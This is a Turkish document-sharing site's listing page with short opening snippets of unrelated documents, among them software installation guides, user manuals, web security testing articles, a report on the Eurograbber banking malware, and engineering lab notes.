10 Ekim 2017 İlgili Versiyon/lar : ETA:SQL, ETA:V.8-SQL İlgili Modül/ler : ÖKC Modülü YENİ NESİL ÖKC İLE ON-LİNE İŞLEMLER (Hugin / Profilo) Programlarımızda Ödeme Kaydedici Cihazlar modülünü kullanarak,
DetaylıSiber Güvenlik Risklerinin Tanımlanması / Siber Güvenlik Yönetişimi
KURUMLAR İÇİN SİBER GÜVENLİK ÖNLEMLERİNİ ÖLÇME TESTİ DOKÜMANI Kurumlar İçin Siber Güvenlik Önlemlerini Ölçme Testi Dokümanı, kamu kurum ve kuruluşları ile özel sektör temsilcilerinin siber güvenlik adına
DetaylıW3af ile Web Uygulama Güvenlik Testleri
W3af ile Web Uygulama Güvenlik Testleri Birkaç tıkla web sayfalarının, veritabanlarının hacklenebildiği, bir komutla kablosuz ağ şifrelerin kırıldığı günleri yaşıyoruz. Çok değil birkaç yıl öncesi sadece
DetaylıETA:MOBİL KURULUM TALİMATI
ETA:MOBİL KURULUM TALİMATI ETA:Mobil Kurulum Adımları Kuruluma başlamadan önce ana bilgisayarınızda kontrol etmeniz gereken minimum gereksinimler aşağıda belirtilmiştir. 1. Microsoft Windows Versiyon Kurulum
DetaylıKullanıcı Kılavuzu. support.ebsco.com
Kullanıcı Kılavuzu support.ebsco.com EBSCOhost lider bilgi sağlayıcılarından derlenmiş çeşitli tam metin ve popüler veri tabanları sunan güçlü bir danışma aracıdır. Bu kullanıcı kılavuzunda, EBSCOhost
DetaylıCoslat Monitor (Raporcu)
Coslat Monitor (Raporcu) Coslat Monitor, Coslat Firewall, Hotspot ve Mirror uygulamalarında oluşturulan zaman damgalı kayıtların analiz edilmesini ve raporlanmasını sağlayan uygulamadır. Coslat Monitor
DetaylıWebSiteDefender ile Web Uygulama Güvenliği
WebSiteDefender ile Web Uygulama Güvenliği Merhabalar. Bu makalemizde, Acunetix firması tarafından web uygulama güvenliği ve kötü amaçlı yazılımlardan korunmak için hazırlanmış olan Web Site Defender ı
Detaylı1 Organizasyon Tanımlama
İçindekiler 1 Organizasyon Tanımlama... 3 1.1 Şirket Tanımlama... 3 1.2 Kullanıcı Tanımlama... 3 1.3 İş Akışında Kullanılacak Grup/Birimlerin Oluşturulması... 3 1.4 Oluşturulan Grup/Birim Altına Kullanıcı
DetaylıRTK Sabit İstasyon Kurulumu (V )
RADYO RTK REFERANS (SABİT) KURULUMU FieldGenius, radyo modem donanımı bulunduran GNSS alıcılarını RTK yöntemi üzerinden kontrol edebilir. Koordinatları bilinen bir jeodezik yer kontrol noktasına sehpa
DetaylıOBJECT GENERATOR 2014
OBJECT GENERATOR 2014 GİRİŞ Sonlu elemanlar modellemesindeki Mechanical ortamında temas tanımlanması, bağlantı elemanı, mesh kontrolü veya yük girdilerinin uygulanması aşamasında çoklu bir yüzey varsa
DetaylıT.C. istanbul ÜNiVERSiTESi ÖĞRENCi BiLGi SiSTEMi. ÖĞRETiM ELEMANI KULLANIM KILAVUZU
T.C. istanbul ÜNiVERSiTESi ÖĞRENCi BiLGi SiSTEMi ÖĞRETiM ELEMANI KULLANIM KILAVUZU 1 1. Sisteme Giriş Nokta Üniversite Otomasyonu sistemini kullanabilmek için öncelikle Windows işletim sisteminde bulunan
DetaylıBQ101 GSM Access Kontrol Ünitesi Windows Programı. Kullanım Kılavuzu. Doküman Versiyon: 1.1 16.11.2015 BQTEK
BQ101 GSM Access Kontrol Ünitesi Windows Programı Kullanım Kılavuzu Doküman Versiyon: 1.1 16.11.2015 BQTEK İçindekiler İçindekiler... 2 1. Genel Bilgi... 3 2. Program Ayarlarının ve Cihaz Bağlantısının
Detaylı1.Mailbox Server Role:
Exchange Server 2007 Role bazlı mimarisi ile organizasyonda ki mail trafiğini sağlamak için farklı sunucular üzerine farklı işlevselliğin dağıtılması ile karşımıza çıkıyor.daha önceki Exchange Server 2003
DetaylıTarihli MikroRUN 05a Sürümü
05.11.2018 Tarihli MikroRUN 05a Sürümü V12 ve V14 Versiyonlarımızdan R/J/F/M Ürünlerimize V15 e Geçmeksizin Aktarım Yapılması V12 ve V14 ten Güncel veri tabanına şirket tablolarını ve Genel tanımların
Detaylı1. PROGRAMLAMA. PDF created with pdffactory Pro trial version www.pdffactory.com
. PROGRAMLAMA UTR-VC Windows altında çalışan konfigürasyon yazılımı aracılığıyla programlanır. Programlama temel olarak kalibrasyon, test ve giriş/çıkış aralıklarının seçilmesi amacıyla kullanılır. Ancak
Detaylı: 36 milyon Euro çalan malware Eurograbber
Olay : 36 milyon Euro çalan malware Eurograbber Tarih :17/12/2012 Geçtiğimiz aylarda Avrupa genelinde yaklaşık 30.000 internet bankacılığı kullanıcısını hedef alan zararlı bir yazılımla ilgili bulgular
Detaylı12 TBT / WEB TASARIM ve PROGRAMLAMA ( Not 3 )
12 TBT / WEB TASARIM ve PROGRAMLAMA ( Not 3 ) 25.09.2017 METİN VE GÖRÜNÜM DÜZENLEME ETİKETLERİ : etiketleri dökümana başlık eklemek için kullanılır. etiketinde ki x ifadesi 1 den 6 ya kadar
DetaylıTürkiye nin lider Şerit ve Tel üreten işletmesi için özel olarak 2014 yılında projelendirilmiş ve geliştirilmiştir.
ENTEGRE ŞERİT ÜRETİM YAZILIMI Octopus BS Entegre Şerit Üretim Yazılımı Türkiye nin lider Şerit ve Tel üreten işletmesi için özel olarak 2014 yılında projelendirilmiş ve geliştirilmiştir. Ham döküm girişi
DetaylıSAVİOR OTOMASYON TEKNİK DESTEK BİRİMİ
FPWINPRO7_FP7_Servo motor home return fonksiyon bloğu (Home Return Fonksiyon Bloğu: Servo motorumuzu Home aramaya göndermek için kullanılır.) İlk olarak FPWINPRO 7 programımızı açalım. Başlamadan önce
DetaylıYMT 412-Yazılım Kalite Ve Güvencesi Yazılım Test Araçları 1/37
YMT 412-Yazılım Kalite Ve Güvencesi Yazılım Test Araçları F ı r a t Ü n i v e r s i t e s i Ya z ı l ı m M ü h e n d i s l i ğ i B ö l ü m ü 1/37 İçindekiler 1 Güvenlik Test Araçları....3 2 Web Performans
DetaylıZirve e-fatura Portal Paketi V. 1.0.xx
Zirve e-fatura Portal Paketi V. 1.0.xx Zirve Yazılım paket programlarından, e-fatura gönderim ve alım işlemlerinin yapılabilmesi için iki farklı e-fatura paketi mevcuttur. 1- Zirve e-fatura Entegratör
DetaylıOdyometri Laboratuvar Testleri Solunum Fonksiyon Testi Göz Tetkikleri Akciğer Grafisi. İSG ve Mobil Sağlık Hizmeti Yazılımı.
Ya z ı l ı m A. Ş İSG ve Mobil Sağlık Hizmeti Yazılımı Mobil Sağlık Tarama Hizmeti veren rmalar ve sağlık kuruluşları için özel olarak hazırlanmış bir yazılım çözümüdür. Odyometri Laboratuvar Testleri
DetaylıBölüm 4 Ardışıl Lojik Devre Deneyleri
Bölüm 4 Ardışıl Lojik Devre Deneyleri DENEY 4-1 Flip-Floplar DENEYİN AMACI 1. Kombinasyonel ve ardışıl lojik devreler arasındaki farkları ve çeşitli bellek birimi uygulamalarını anlamak. 2. Çeşitli flip-flop
Detaylı